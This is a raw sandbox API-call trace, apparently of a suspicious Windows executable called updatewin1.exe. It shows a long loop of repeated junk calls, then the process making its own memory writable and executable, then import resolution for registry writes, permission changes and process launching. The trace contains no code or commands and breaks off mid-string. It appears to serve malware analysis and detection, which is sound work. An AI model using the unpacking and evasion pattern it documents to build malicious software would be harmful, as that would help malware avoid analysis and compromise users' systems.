0 [0111.787] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.787] AddAtomA (lpString=0x0) returned 0x0 [0111.787] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.787] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.787] AddAtomA (lpString=0x0) returned 0x0 [0111.787] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.787] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.787] AddAtomA (lpString=0x0) returned 0x0 [0111.787] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.787] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.787] AddAtomA (lpString=0x0) returned 0x0 [0111.787] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.787] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.787] AddAtomA (lpString=0x0) returned 0x0 [0111.787] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.787] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.787] AddAtomA (lpString=0x0) returned 0x0 [0111.787] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.788] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.788] AddAtomA (lpString=0x0) returned 0x0 [0111.788] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.788] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.788] AddAtomA (lpString=0x0) returned 0x0 [0111.788] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.788] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.788] AddAtomA (lpString=0x0) returned 0x0 [0111.788] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.788] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.788] AddAtomA (lpString=0x0) returned 0x0 [0111.788] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.788] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.788] AddAtomA (lpString=0x0) returned 0x0 [0111.788] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.788] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.788] AddAtomA (lpString=0x0) returned 0x0 [0111.788] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.788] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.788] AddAtomA (lpString=0x0) returned 0x0 [0111.788] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.789] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.789] AddAtomA (lpString=0x0) returned 0x0 [0111.789] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.789] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.789] AddAtomA (lpString=0x0) returned 0x0 [0111.789] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.789] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.789] AddAtomA (lpString=0x0) returned 0x0 [0111.789] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.789] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.789] AddAtomA (lpString=0x0) returned 0x0 [0111.789] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.789] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.789] AddAtomA (lpString=0x0) returned 0x0 [0111.789] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.789] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.789] AddAtomA (lpString=0x0) returned 0x0 [0111.789] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.789] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.789] AddAtomA (lpString=0x0) returned 0x0 [0111.789] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.789] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.790] AddAtomA (lpString=0x0) returned 0x0 [0111.790] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.790] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.790] AddAtomA (lpString=0x0) returned 0x0 [0111.790] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.790] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.790] AddAtomA (lpString=0x0) returned 0x0 [0111.790] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.790] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.790] AddAtomA (lpString=0x0) returned 0x0 [0111.790] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.790] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.790] AddAtomA (lpString=0x0) returned 0x0 [0111.790] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.790] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.790] AddAtomA (lpString=0x0) returned 0x0 [0111.790] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.790] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.790] AddAtomA (lpString=0x0) returned 0x0 [0111.790] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.790] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.790] AddAtomA (lpString=0x0) returned 0x0 [0111.791] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.791] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.791] AddAtomA (lpString=0x0) returned 0x0 [0111.791] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.791] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.791] AddAtomA (lpString=0x0) returned 0x0 [0111.791] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.791] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.791] AddAtomA (lpString=0x0) returned 0x0 [0111.791] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.791] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.791] AddAtomA (lpString=0x0) returned 0x0 [0111.791] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.791] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.791] AddAtomA (lpString=0x0) returned 0x0 [0111.791] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.791] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.791] AddAtomA (lpString=0x0) returned 0x0 [0111.791] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.791] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.791] AddAtomA (lpString=0x0) returned 0x0 [0111.791] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.792] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.792] AddAtomA (lpString=0x0) returned 0x0 [0111.792] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.792] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.792] AddAtomA (lpString=0x0) returned 0x0 [0111.792] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.792] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.792] AddAtomA (lpString=0x0) returned 0x0 [0111.792] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.792] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.792] AddAtomA (lpString=0x0) returned 0x0 [0111.792] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.792] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.792] AddAtomA (lpString=0x0) returned 0x0 [0111.792] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.792] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.792] AddAtomA (lpString=0x0) returned 0x0 [0111.792] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.792] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.792] AddAtomA (lpString=0x0) returned 0x0 [0111.792] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.792] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.793] AddAtomA (lpString=0x0) returned 0x0 [0111.793] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0111.793] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0111.866] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0111.866] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0111.866] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0111.867] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0111.867] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0111.867] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0111.867] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0111.867] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0111.867] SetErrorMode (uMode=0x400) returned 0x0 [0111.867] SetErrorMode (uMode=0x0) returned 0x400 [0111.867] GetVersionExA (in: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0111.867] VirtualAlloc (lpAddress=0x0, dwSize=0x2d200, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0111.871] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5d8 | out: lpflOldProtect=0x18f5d8*=0x2) returned 1 [0111.982] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0111.984] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0111.985] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0111.985] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0111.985] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0111.985] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0111.985] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0111.985] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0111.985] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0111.985] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0111.985] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0111.986] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0111.986] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0111.986] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0111.986] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0111.986] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0111.986] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0111.986] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0111.986] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0111.986] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0111.986] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0111.987] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0112.005] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0112.006] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0112.006] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0112.006] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0112.006] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0112.006] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0112.006] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0112.006] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0112.006] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0112.006] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0112.006] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0112.007] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0112.007] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0112.007] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0112.007] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0112.007] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0112.007] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0112.007] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0112.007] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0112.007] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0112.007] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0112.007] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0112.008] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0112.008] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0112.008] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0112.008] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0112.008] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSListHead") returned 0x77c794a4 [0112.008] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0112.008] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0112.008] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0112.008] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0112.008] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0112.009] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0112.009] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0112.009] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0112.009] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0112.009] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0112.009] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0112.009] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0112.009] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0112.009] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0112.009] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0112.010] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0112.010] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0112.010] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0112.010] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0112.010] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0112.010] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0112.010] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0112.010] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0112.010] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0112.010] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0112.011] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0112.011] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileExW") returned 0x76d51811 [0112.011] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0112.011] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0112.011] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0112.011] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0112.011] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0112.011] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyExW") returned 0x777240fe [0112.012] GetProcAddress (hModule=0x77710000, lpProcName="SetSecurityDescriptorDacl") returned 0x7772415e [0112.012] GetProcAddress (hModule=0x77710000, lpProcName="InitializeSecurityDescriptor") returned 0x77724620 [0112.012] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0112.012] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0112.012] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0112.012] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0112.012] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0112.012] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0112.012] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0112.013] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0112.013] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0112.013] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0112.025] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0112.025] atexit (param_1=0x5263d8) returned 0 [0112.027] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5dc | out: lpSystemTimeAsFileTime=0x18f5dc*(dwLowDateTime=0x1ebc1ba0, dwHighDateTime=0x1d5fd35)) [0112.027] GetCurrentThreadId () returned 0x9a4 [0112.027] GetCurrentProcessId () returned 0x994 [0112.027] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5d4 | out: lpPerformanceCount=0x18f5d4*=23231468084) returned 1 [0112.093] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0112.095] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0112.095] GetLastError () returned 0x57 [0112.096] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0112.096] GetLastError () returned 0x57 [0112.096] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0112.097] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0112.097] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0112.097] GetLastError () returned 0x57 [0112.097] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0112.097] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0112.100] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0112.100] GetLastError () returned 0x57 [0112.100] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0112.100] GetLastError () returned 0x57 [0112.100] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0112.100] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0112.101] GetProcessHeap () returned 0x510000 [0112.101] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0112.101] GetLastError () returned 0x57 [0112.101] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0112.101] GetLastError () returned 0x57 [0112.101] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0112.101] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x364) returned 0x53a9e8 [0112.102] SetLastError (dwErrCode=0x57) [0112.103] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xc00) returned 0x53ad58 [0112.139] GetStartupInfoW (in: lpStartupInfo=0x18f510 | out: lpStartupInfo=0x18f510*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033b0, hStdOutput=0x778451b8, hStdError=0xfffffffe)) [0112.139] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0112.139] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0112.139] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0112.139] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe\" " [0112.139] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe\" " [0112.139] IsValidCodePage (CodePage=0x4e4) returned 1 [0112.139] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f530 | out: lpCPInfo=0x18f530) returned 1 [0112.139] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18edf8 | out: lpCPInfo=0x18edf8) returned 1 [0112.139] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0112.139] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0112.139] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18ee0c | out: lpCharType=0x18ee0c) returned 1 [0112.143] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0112.143] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb48, cchWideChar=256 | out: lpWideCharStr=" 